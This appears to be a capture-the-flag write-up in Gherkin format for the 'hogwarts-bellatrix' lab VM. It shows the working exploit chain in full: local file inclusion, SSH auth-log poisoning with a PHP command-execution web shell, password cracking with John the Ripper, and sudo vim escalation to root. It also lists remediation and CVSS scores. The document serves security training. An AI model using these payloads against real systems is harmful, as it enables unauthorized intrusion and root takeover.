## Version 1.4.1
## language: en

Feature:
  TOE:
    hogwarts-bellatrix
  Location:
   http://192.168.59.128/index.php
  CWE:
    CWE-0098: Improper Control of Filename for Include/PHP Program
    https://cwe.mitre.org/data/definitions/98.html
    CWE-0078: Improper Neutralization of Special Elements used in an OS Command
    https://cwe.mitre.org/data/definitions/78.html
  Rule:
    R037. Parameters without sensitive data
    https://fluidattacks.com/products/rules/list/037/
    R173. Discard unsafe inputs
    https://fluidattacks.com/products/rules/list/173/
  Goal:
    Gain System Root and Bellatrix Lestrange flag "root.txt"
  Recommendation:
    Update the environment hardening and update PHP version

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Parrot Os       | 4.11          |
    | Vmware 16 Pro   | 16.1.0        |
    | Google Chrome   | 89.0.4389.90  |
    | Nmap            | 7.91          |
    | OpenSSH         | 8.4p1         |

  TOE information:
    Given a Bellatrix OVA file [evidence](bellatrix1.png)
    When I run it on Vmware
    And I realize that it is a Linx Ubuntu Machine
    Then I see two users in the login
    """
    Bellatrix & Lestrange
    """
    And I try to login with aleatory credentials but it fails
    And I check the Virtual Machine IP address
    Then I scan the IP with Nmap [evidence](bellatrix2.png)
    And I can see 2 open ports

  Scenario: Normal use case
    Given the open port of HTTP
    When I search "http://192.168.59.128"
    Then I access to a web page [evidence](bellatrix3.png)

  Scenario: Static detection
    Given I get access to the source code [evidence](bellatrix4.png)
    Then I see some clue in the code related to LFI
    """
    /*
    $file = $_GET['file'];
    if(isset($file))
    {
    include("$file");
    }
    */
    """

  Scenario: Dynamic detection
    Given I access to "http://192.168.59.128"
    And I get the clue "ikilledsiriusblack.php" from the source code
    When I try to test LFI vulnerabilities
    """
    ikilledsiriusblack.php?file=../../../../etc/passwd
    """
    Then I can see the passwd file [evidence](bellatrix5.png)
    And I realize that the system has some flaws

  Scenario: Exploitation
    Given I have access to "192.168.59.128"
    When I try other LFI method [evidence](bellatrix6.png)
    """
    ikilledsiriusblack.php?file=../../../../var/log/auth.log
    """
    Then I get a directory [evidence](bellatrix7.png)
    And I try to exploit with LFI Log Poisoning [evidence](bellatrix8.png)
    """
    ssh '<?php system($_GET['cmd']); ?>'@192.168.59.128
    """
    And I realize that I found two files [evidence](bellatrix9.png)
    Then I see the file in the browser [evidence](bellatrix10.png)
    And I found a wordlist and an username
    And I download the files to my machine [evidence](bellatrix11.png)
    """
    wget http://192.168.59.128/c2VjcmV0cw==/Swordofgryffindor
    wget http://192.168.59.128/c2VjcmV0cw==/.secret.dic
    """
    And I use the files for crack the password with Jonh the Ripper
    """
    john --wordlist=.secret.dic Swordofgryffindor
    """
    And I get the password for the user Lestrange [evidence](bellatrix12.png)
    Then I try to enter with the password into the machine
    And I get access [evidence](bellatrix13.png)
    Given I have access to the user
    And I need to check if I have Root access
    Then I run in the terminal a ssh session
    """
    ssh lestrange@192.169.59.128
    """
    And I check my permissions typing
    """
    sudo --list
    """
    Then I realize that I do not have Root access [evidence](bellatrix14.png)
    And I see that Vim has Root permissions
    Then I can do Privilege Escalation with Vim
    """
    sudo vim
    :set shell=/bin/sh
    :shell
    """
    Then I get Root access and the Flag [evidence](bellatrix15.png)

  Scenario: Remediation
    When I do security test to Web Applications
    Then I can enforce the environment hardening
    And I can update the PHP version for the Web Application
    Then I avoid many vulnerabilities that could be attack vectors

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.7/10 (Critical) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.2/10 (Critical) - E:F/RL:T/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.2/10 (Critical) - CR:M/IR:X/AR:X/MC:H/MI:N/MA:N/

  Scenario: Correlations
    No correlations have been found to this date 2021-04-05
